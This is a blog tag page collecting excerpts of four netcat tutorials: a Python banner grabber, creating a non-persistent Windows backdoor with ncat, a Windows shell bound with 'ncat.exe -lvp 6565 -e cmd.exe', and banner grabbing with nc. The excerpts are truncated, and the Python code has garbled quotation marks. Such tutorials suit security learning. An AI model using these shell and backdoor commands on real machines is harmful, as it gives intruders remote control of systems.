Tag: netcat

Python

Banner Grabbing with Python

A simple banner grabber in Python: import optparse from socket import *   def banner(targetHost, targetPort): try: connsocket = socket(AF_INET, SOCK_STREAM) connsocket.connect((targetHost, targetPort)) connsocket.send(’Hi therern’) results = connsocket.recv(100) print ” + str(results) connsocket.close() except: print ‘error’ def main(): options = {} parser = optparse.OptionParser(’usage %prog -H <target host> -P <target port>’) parser.add_option(’-H’, ‘–host’, dest=’target_host’, type=’string’, …

Backdoors, Netcat

Create Backdoor in Windows with ncat

Let’s see how we can create a non-persistent backdoor in Windows with ncat. We are going to need ncat.exe. Download and install Nmap. Locate ncat.exe in nmap’s installation folder. You will probably find ncat.exe, in this folder x:\Program Files (x86)\Nmap if you have 64bit Windows 7 system as I have. Copy it. It can work …

Microsoft Windows, Netcat

Reverse shell with netcat in Windows

> Download and install Nmap! > Locate ncat.exe. You will find it in this folder x:\Program Files (x86)\Nmap if you have an 64bit windows 7 os. > Open command line (cmd). > Change directory to x:\Program Files (x86)\Nmap. To bind command line execute ncat.exe -lvp 6565 -e cmd.exencat.exe -lvp 6565 -e cmd.exe or execute the …

Linux, Netcat, Tools

Banner grabbing with netcat!

To gather more information about a service running on a system’s open port we are going to use a known technique, known as banner grabbing and netcat network tool.  nc -nvv x.x.x.x 80 -n        Suppress name/port resolutions -v        Verbose You will get an answer like this: Connection to 85.25.132.39 80 port [tcp/*] succeeded! …